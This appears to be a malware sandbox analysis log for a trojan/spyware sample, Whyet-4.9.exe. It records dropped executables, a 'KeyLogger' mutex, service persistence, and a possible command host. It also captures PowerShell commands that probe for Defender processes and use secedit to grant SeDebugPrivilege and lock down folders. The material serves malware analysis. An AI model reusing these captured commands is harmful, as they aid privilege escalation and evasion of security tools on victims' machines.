Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180024A60	2_2_0000000180024A60
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180027268	2_2_0000000180027268
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003029C	2_2_000000018003029C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002A29C	2_2_000000018002A29C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180023AF0	2_2_0000000180023AF0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800352F8	2_2_00000001800352F8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180031328	2_2_0000000180031328
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001F34C	2_2_000000018001F34C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003E354	2_2_000000018003E354
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180021B88	2_2_0000000180021B88
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800223CC	2_2_00000001800223CC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180026BD4	2_2_0000000180026BD4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180022BE8	2_2_0000000180022BE8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001EBFC	2_2_000000018001EBFC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180020C38	2_2_0000000180020C38
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180034C50	2_2_0000000180034C50
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001E454	2_2_000000018001E454
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002649C	2_2_000000018002649C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800214A8	2_2_00000001800214A8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001F520	2_2_000000018001F520
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001ED40	2_2_000000018001ED40
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003CD74	2_2_000000018003CD74
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002759C	2_2_000000018002759C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180008DC0	2_2_0000000180008DC0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800215C4	2_2_00000001800215C4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180037DC8	2_2_0000000180037DC8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800205D8	2_2_00000001800205D8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002A600	2_2_000000018002A600
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180032638	2_2_0000000180032638
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180028E38	2_2_0000000180028E38
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180035694	2_2_0000000180035694
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180027EB0	2_2_0000000180027EB0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002D6C0	2_2_000000018002D6C0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180026EEC	2_2_0000000180026EEC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003D774	2_2_000000018003D774
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800347B0	2_2_00000001800347B0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180039FD4	2_2_0000000180039FD4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001FFE0	2_2_000000018001FFE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8488E7506	12_2_00007FF8488E7506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8488E82B2	12_2_00007FF8488E82B2
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D7AEE0	32_2_04D7AEE0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D7F69A	32_2_04D7F69A
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D8A03E	32_2_04D8A03E
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D82A81	32_2_04D82A81
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D3B49F	32_2_04D3B49F
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D3FC59	32_2_04D3FC59
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D43040	32_2_04D43040

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 04D79E44 appears 95 times
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 04D3A9DA appears 42 times
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 04D3A403 appears 94 times
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 04D7A41B appears 46 times
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: String function: 00000001800120F0 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: String function: 0000000180002960 appears 55 times

Source: Whyet-4.9.exe

Static PE information: invalid certificate

Source: Whyet-4.9.exe, 00000000.00000002.2192169707.0000000000C27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesu vs Whyet-4.9.exe
Source: Whyet-4.9.exe, 00000000.00000002.2192169707.0000000000C27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesuf_rt.exeL vs Whyet-4.9.exe
Source: Whyet-4.9.exe, 00000000.00000003.2054506802.0000000002AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Whyet-4.9.exe
Source: Whyet-4.9.exe, 00000000.00000003.2054506802.0000000002AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \StringFileInfo\%04x%04x\OriginalFilename vs Whyet-4.9.exe
Source: Whyet-4.9.exe, 00000000.00000003.2054506802.0000000002AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SpecialBuildPrivateBuildOriginalFilenameLegalTrademarksLegalCopyrightProductNameInternalNameFileDescriptionCompanyNameProductVersionFileVersion\StringFileInfo\%04x%04x\SpecialBuild\StringFileInfo\%04x%04x\OriginalFilename\StringFileInfo\%04x%04x\Comments\StringFileInfo\%04x%04x\LegalTrademarks\StringFileInfo\%04x%04x\LegalCopyright\StringFileInfo\%04x%04x\ProductName\StringFileInfo\%04x%04x\InternalName\StringFileInfo\%04x%04x\FileDescription\StringFileInfo\%04x%04x\CompanyName" vs Whyet-4.9.exe
Source: Whyet-4.9.exe, 00000000.00000003.2054506802.0000000002AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesuf_rt.exeL vs Whyet-4.9.exe
Source: Whyet-4.9.exe, 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename360leakfixer.exe0 vs Whyet-4.9.exe

Source: Process Memory Space: powershell.exe PID: 4956, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: LxN_oT.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9971604567307693
Source: LxN_oT.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9977279974489796
Source: LxN_oT.exe.2.dr	Static PE information: Section: ZLIB complexity 1.0000651041666666
Source: LxN_oT.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9930013020833334
Source: iusb3mon.exe.17.dr	Static PE information: Section: ZLIB complexity 0.9971604567307693
Source: iusb3mon.exe.17.dr	Static PE information: Section: ZLIB complexity 0.9977279974489796
Source: iusb3mon.exe.17.dr	Static PE information: Section: ZLIB complexity 1.0000651041666666
Source: iusb3mon.exe.17.dr	Static PE information: Section: ZLIB complexity 0.9930013020833334

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@243/103@2/3

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Code function: 2_2_0000000180010AB0 GetLastError,FormatMessageA,

2_2_0000000180010AB0

Source: C:\Users\user\Desktop\Whyet-4.9.exe

Code function: 0_2_00007FF676FA19B4 GetCurrentDirectoryA,GetTempPathA,lstrlenA,lstrcpyA,lstrlenA,lstrcatA,wsprintfA,wsprintfA,DeleteFileA,RemoveDirectoryA,GetFileAttributesA,CreateDirectoryA,lstrcpyA,SetCurrentDirectoryA,lstrcpyA,CreateDirectoryA,SetCurrentDirectoryA,lstrcpyA,lstrlenA,lstrcatA,lstrcpyA,lstrcpyA,lstrcatA,lstrcpyA,lstrcatA,GetDiskFreeSpaceA,lstrcpyA,SetCurrentDirectoryA,

0_2_00007FF676FA19B4

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: GetModuleFileNameA,wsprintfA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlenA,RegSetValueExA,

32_2_04D76D6C

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D75CE6 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

32_2_04D75CE6

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_00572170 Sleep,CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,SysFreeString,CoUninitialize,CoUninitialize,SysFreeString,SysAllocString,VariantInit,VariantInit,VariantInit,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,_com_issue_error,MessageBoxA,

32_2_00572170

Source: C:\ProgramData\Program\iusb3mon.exe

32_2_04D767CC

Source: C:\ProgramData\Program\iusb3mon.exe

32_2_04D767CC

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

File created: C:\Program Files\product1\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

File created: C:\Users\Public\Documents\VCH0Sag8\

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1288:120:WilError_03
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Mutant created: \Sessions\1\BaseNamedObjects\huazai168.com:25445:
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Mutant created: \Sessions\1\BaseNamedObjects\KeyLogger
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03

Source: C:\Users\user\Desktop\Whyet-4.9.exe

File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0

Jump to behavior

Source: Whyet-4.9.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select ParentProcessId from Win32_Process where ProcessId=5800

Source: C:\Users\user\Desktop\Whyet-4.9.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Whyet-4.9.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: Whyet-4.9.exe	Virustotal: Detection: 12%
Source: Whyet-4.9.exe	ReversingLabs: Detection: 13%

Source: iusb3mon.exe	String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAva
Source: iusb3mon.exe	String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAva
Source: iusb3mon.exe	String found in binary or memory: lable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdl
Source: iusb3mon.exe	String found in binary or memory: lable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdl

Source: C:\Users\user\Desktop\Whyet-4.9.exe

File read: C:\Users\user\Desktop\Whyet-4.9.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Whyet-4.9.exe "C:\Users\user\Desktop\Whyet-4.9.exe"
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5655410 "__IRAFN:C:\Users\user\Desktop\Whyet-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=5800').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
